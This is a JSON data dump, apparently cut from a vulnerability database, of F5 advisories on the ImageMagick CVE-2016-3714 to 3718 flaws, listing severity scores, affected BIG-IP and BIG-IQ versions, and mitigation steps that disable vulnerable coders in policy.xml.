"baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-09T00:00:00", "type": "f5", "title": "SOL03151140 - ImageMagick vulnerability CVE-2016-3714", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-08-16T00:00:00", "id": "SOL03151140", "href": "http://support.f5.com/kb/en-us/solutions/public/k/03/sol03151140.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. 
Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coder listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL10550253 - ImageMagick 
vulnerability CVE-2016-3715", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL10550253", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10550253.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. 
Edit the **ImageMagick** global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coder listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL25102203 - ImageMagick vulnerability CVE-2016-3716", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL25102203", "href": "http://support.f5.com/kb/en-us/solutions/public/k/25/sol25102203.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:07", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. 
For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" />\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL25102203: ImageMagick vulnerability CVE-2016-3716\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "f5", "title": "SOL29154575 - ImageMagick vulnerability CVE-2016-3717", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-09-02T00:00:00", "id": "SOL29154575", "href": "http://support.f5.com/kb/en-us/solutions/public/k/29/sol29154575.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T21:07:35", "description": "\nF5 Product Development has assigned ID 591908 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H29154575 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None 
\nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.1 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" />\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-14T02:43:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3717", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-08-24T00:50:00", "id": "F5:K29154575", "href": "https://support.f5.com/csp/article/K29154575", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T02:18:16", "description": "\nF5 Product Development has assigned ID 591806 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H592135 on the** Diagnostics** >** Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP 
ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| ImageMagick \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ ADC| 4.5.0| None| Low| ImageMagick \nBIG-IQ Centralized Management| 5.0.0 \n4.6.0| None| Low| ImageMagick \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ImageMagick \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /> \n</policymap>\n\n 5. 
Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-10T09:23:00", "type": "f5", "title": "ImageMagick vulnerability CVE-2016-3714", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2017-03-17T20:53:00", "id": "F5:K03151140", "href": "https://support.f5.com/csp/article/K03151140", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:49", "description": "\nF5 Product Development has assigned ID 591894 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H10550253 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not 
vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 